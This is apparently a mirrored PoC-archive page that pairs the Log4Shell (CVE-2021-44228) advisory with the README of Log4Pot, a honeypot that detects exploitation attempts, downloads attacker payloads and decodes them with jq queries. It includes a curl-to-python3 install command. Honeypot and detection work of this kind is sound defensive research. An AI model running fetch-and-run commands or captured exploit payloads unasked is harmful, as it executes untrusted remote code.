Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/thomaspatzke/Log4Pot
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
A honeypot for the Log4Shell vulnerability (CVE-2021-44228).
Readme
# Log4Pot

A honeypot for the Log4Shell vulnerability (CVE-2021-44228).

License: [GPLv3.0](https://www.gnu.org/licenses/gpl-3.0.html)

## Features

* Listen on various ports for Log4Shell exploitation.
* Detect exploitation in request line and headers.
* Download exploit payloads recursively.
* Log to file and Azure blob storage.

## Usage

1. Install Poetry: `curl -sSL https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py | python3 -`
2. Fetch this GitHub repository `git clone https://github.com/thomaspatzke/Log4Pot.git`
3. Change directory into the local copy with `cd Log4Pot`
4. Install pycurl dependencies (Debian / Ubuntu): `apt install libcurl4-openssl-dev libssl-dev python3-dev build-essential`
5. Install python dependencies: `poetry install`
6. Put parameters into log4pot.conf, see `poetry run python log4pot.py --help` for an overview.
7. Run: `poetry run python log4pot.py @log4pot.conf`

Alternatively, you can also run log4pot without external dependencies:
```
$ python log4pot.py @log4pot.conf
```
This will run log4pot without support for logging to Azure blob storage.

## Redirecting traffic / non-container setup

To redirect traffic to port 80 and 443 to Log4Pot, use following iptables commands:

`iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080`

`iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8443`

## Log Analysis Tool

The script `log4pot-loganalyzer.py` extracts all payloads, decodes them with the current decoder and builds a timeline from both. Use is as follows:

```
python log4pot-loganalyzer.py -o <output directory> <input log files>
```

## Analyzing Logs with JQ

List payloads from exploitation attempts:
```
select(.type == "exploit") | .payload
```

Decode all base64-encoded payloads from JNDI exploit:
```
select(.type == "exploit" and (.payload | contains("Base64"))) | .payload | sub(".*/Base64/"; "") | sub ("}$"; "") | @base64d
```

Extract all SHA256 hashes from files downloaded from URLs:
```
[ .[] | select(.type == "payload") | .urls | select((. | length) > 0) | to_entries | .[].value | select((. | length) == 64) ] | unique | .[]
```
File Snapshot

 [4.0K]  /data/pocs/a66cf4f6ff7cf896aff089983ba5a81de79a7589
├── [  10]  default-url-allowlist
├── [ 144]  default-url-denylist
├── [ 34K]  LICENSE
├── [4.0K]  log4pot
│   ├── [2.3K]  deobfuscator.py
│   ├── [1.0K]  expression_parser.py
│   ├── [   0]  __init__.py
│   ├── [5.6K]  loganalyzer.py
│   ├── [9.8K]  payloader.py
│   └── [2.2K]  s3.py
├── [ 284]  log4pot.conf.example
├── [4.4K]  log4pot-loganalyzer.py
├── [ 10K]  log4pot-server.py
├── [ 36K]  poetry.lock
├── [ 460]  pyproject.toml
├── [2.1K]  README.md
├── [4.0K]  responses
│   ├── [  64]  default.json
│   ├── [ 12K]  sap-netweaver.html
│   ├── [1.9K]  tomcat-default.html
│   └── [3.8K]  vmware-esx-4.html
└── [4.0K]  test
    ├── [1.2K]  test_deobfuscation.py
    └── [ 482]  test_payloader.py

3 directories, 21 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →